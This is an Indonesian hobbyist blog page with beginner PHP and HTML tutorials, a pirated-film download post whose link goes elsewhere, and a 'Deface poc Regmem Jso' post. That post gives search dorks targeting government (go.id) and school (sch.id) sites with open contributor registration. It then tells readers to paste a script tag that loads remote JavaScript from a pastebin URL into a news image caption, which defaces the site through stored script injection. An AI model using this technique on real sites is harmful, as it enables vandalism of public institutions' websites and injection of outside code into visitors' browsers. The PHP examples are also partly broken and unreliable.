Newest Post

Download film joker

| Friday, October 11, 2019
Read more »
Assalamualaikum


Maaf gan lama gak post hehhehe

Buat kalian yang males ke bioskop ato lagi gak punya duit wkwkwk:v

kali ini gue mau kasih tau cara download film jokerr eaakk lay lay lay lay.. 😂

Oke nih gue kan baik hati gue kasih link nya nih gan di bawah 👇

tps://semawur.com/post/83-apa-itu-vcore-dan-bagaimana-itu-membantu-dengan-overclocking

Selamat menikmati
Seyouuu..

Download film joker

Posted by : Bocah TKR
Date :Friday, October 11, 2019
With 0comments

Dasar Pemograman PHP

| Wednesday, September 4, 2019
Read more »


Assalamualaikum
Saya akan membahas tentang PHP DASAR

Yuk Latihan .....      
PHP
PHP adalah sebuah bahasa pemograman yang berbentuk scripting, sistem kerja dari program ini adalah sebagai interpreter.
    

 _______________________________
A. Cara Menggunakan PHP
_______________________________
Sebagai bahasa scripting lainya dalam html,
Untuk menu menuliskan kode PHP harus di swalali dan di akhiri dengan tanda tertentu,berikut tanda-tanda awal dan akhir penulisan script PHP :
--------------------
Di awali.          
--------------------
1.<?                    
2.<php.               
3.<script language=”php”> 
_____________
Di akhiri.
-------------------
1.?>
2.?>
3.</script>


Contoh 1 :
<?php
phpinfo();
?>

----------------------------------------------------------
B. Menampilkan Data Dalam Program
----------------------------------------------------------
Dalam PHP memiliki beberapa perintah yang dapat menampilkan informasi, diantaranya
adalah echo dan print.

Contoh : contoh2.php
<?php 
echo "Informasi ini ditampilkan dengan echo" ;
print ('Informasi ini ditampilkan dengan print') ;
?>

------------------------------
C. PHP Dalam Html
------------------------------
  PHP dapat berdiri sendiri atau dapat di tulis dalam tag-tag Html.

Contoh : contoh3.php (PHP dalam HTML)
<HTML>
<HEAD>
<TITLE> BELAJAR PHP DASAR</TITLE>
</HEAD>
<BODY BGCOLOR="#adadad">
<h1>
<?php
echo "semangat dan jangan menyerah";
?>
</h1>
</BODY>
</HTML>

Contoh : contoh4.php(HTML dalam PHP)
<?php
echo "<HTML>";
echo "<HEAD>";
echo "<TITLE> HTML dalam PHP </TITLE>";
echo "</HEAD>";
echo '<BODY BGCOLOR="#FFFFFF">';
echo '<FONT SIZE="5" COLOR="#FF0000" face="Trebuchet ms">';
echo "Script ini ditulis dengan HTML dalam PHP";
echo "</FONT>";
echo "</BODY>";
echo "</HTML>";
?>

------------------------------------
D. Variabel Dalam PHP
-------------------------------------
Aturan-aturan yang digunakan dalam pembuatan Variabel adalah sbb:
1.pembentukan Variabel dalam PHP diawali dengan dengan tanda string ($).
2.Variabel dapat di gunakan dalam huruf kecil maupun huruf kapital atau pun perpaduan antara huruf kecil dan kapital.
3.penulis awal variabel tidak boleh menggunakan angka
4.apabila ingi menggunakan angka sebagai variabel, maka dapat menggunakan underscore ( _ ) untuk semulanya
5. Tidak menggunakan character selain huruf, angka dan underscore.


1. Variabel Biasa
    Contoh : Contoh5.PHPh

<?php
$kampus="TKR CODING";
$TTG LAHIR='27-04-2002';
echo "NAMA SAYA RISKY  $PEKALONGAN ";
echo "angkatan $angkatan";
?>

2.Variabel antar halaman
Contoh : contoh6.html

<HTML>
<HEAD>
<TITLE> Variabel antar Halaman </TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<FORM METHOD=POST ACTION="var_hasil.php">
<H2>Form Registrasi :</H2><hr>
<TABLE>
<TR>
<TD>Nama</TD>
<TD>:<INPUT TYPE="text" NAME="txtnama"></TD>
</TR>
<TR>
<TD>Email</TD>
<TD>:<INPUT TYPE="text" NAME="txtmail"></TD>
</TR>
<TR>
<TD colspan=2 align=center><INPUT TYPE="submit" 
value="Tampilkan"></TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>


Okee pembahasan akan saya lanjut ke part 2 

Terimakasih
Jangan Lupa share

Seyouuuuuu............



Dasar Pemograman PHP

Posted by : Bocah TKR
Date :Wednesday, September 4, 2019
With 3comments

BALAJAR PEMROGRAMAN HTML

| Friday, August 30, 2019
Read more »
Part 1
BELAJAR PEMROGRAMAN HTML 
_____________________________________




Bagi orang awam atau pemula pasti bertanya tanya apasihh  HTML 
Oke apa sih HTML itu dan apa artinya ?..
HTML adalah kependekan dari Hyper Text Markup Laguage, yaitu sebuah bahasa Markup yang di gunakan di gunakan untuk membuat sebuah halaman Web.  si HTML inilah yang menyusun sebuah halaman Web menjadi bagian yang kita lihat di internet.
HTML mempunya fungsi di antaranya dapat menentukan format sesuai Text,
Membuat list, membuat link, menyisipkan gambar, dan membuat link ke Dokumen lain. HTML juga berfungsi untuk mengatur tampilan dari halaman web dan isinya, musik,gambar, audio,dll.

Untuk mulai memahami cara menggunakan HTML, mari simak tulisan di bawah gan 👇

_____________________________________________

<html>
        <head>
        <title> page title </title>
        </head>

<body>
        <h1> heading ke 1</h1>
        <P> Paragraf nya </p>
     </body>
</html>
_____________________________________________


halaman HTML terdiri dari tag,elment,dan atribut atau halaman HTML itu disusun oleh elment - elment seperti paragraf, tabel,list,body dan masih banyak lagi
Penanda setiap elment menggunakan tag dengan format penulisan yang  menggunakan tanda baca "<",">"/" atau <tag>content</tag>

  Dan lebih jelas nya mari kita praktekan
Pada contoh kali ini saya praktekan menggunakan notepad ++ gan, silakan kalo kalian mau download ada ko di Play store

Pada contoh di atas <h1> heading ke 1</h>
Merupakan tag
____________________________________________
<html>
<head>
<title> Halaman Utama </title>
</head>

<body>
  <h1> Hallo nama saya Risky </h1>
<p> Salam Kenal ya </p>
</body>

</html>
_____________________________________________

Setelah itu, simpan file tersebut ke dalam folder sesuka kalian dan beri nama akhir.HTML dan saya kasih nama file itu Dengan nama Hay.HTML.
dan silakan klik file kalian untuk melihat halaman HTML yang kalian sudah buat.



Dan bagaimana cara menampilkan gambar dan ukuran widht dan height pada gambar nya 👇

<html>
<head>
<title>Halaman Utama</title>
</head>
<body>
 <h1>Hello saya Risky</h1>
<p>salam kenal ya</p>
<img src="https://i.ibb.co/vQvqqP0/49-496311-grey-jedi-anonymous-logo-by-paradigm-shifting-jedi.jpg" width="140" height="140">
<br> <a href="https://tkr-coding.blogspot.com">ini adalah link</a> </body>
</html>


Okee sekian
Pembahasan tentang pemograman Html akan saya lanjut ke part 2 ya

~Terimakasih ~

BALAJAR PEMROGRAMAN HTML

Posted by : Bocah TKR
Date :Friday, August 30, 2019
With 0comments

Deface poc Regmem Jso

| Saturday, August 24, 2019
Read more »
Assalammualaikum

Saya akan memberikan Tutorial
Cara Deface Regmem Jso

Dork : inurl://kontributor site:go.id
           inurl://kontributor 
           inurl://kontributor site:sch.id

Script Jso bisa comot di bawah 👇

Script Jso : 
<script type="text/javascript"                    SRC="https://pastebin.com/raw/p68xd1ZZ"></script>

Script Jso :
<script type="text/javascript" 

Oke kita cari targetnya gan di google..
   

Oke setelah Nemu Target nya kalian isi formulir nya....



Setelah itu kalian akan masuk ke dalam dasboard nya gan dan klik berita aja



Setelah masuk klik Tambahkan Berita gan
Dan isi semua formulir nya gan...


Kalian tempel script Jso nya di bagian ket.Gambar
Klik Tambahkan
Dan cara mengakses nya 


Bisa di lihat sendiri gan.....

Oke thanks...
Jangan Lupa share 

Seyouuuuuu............

Deface poc Regmem Jso

Posted by : Bocah TKR
Date :Saturday, August 24, 2019
With 1 comments:
▲Top▲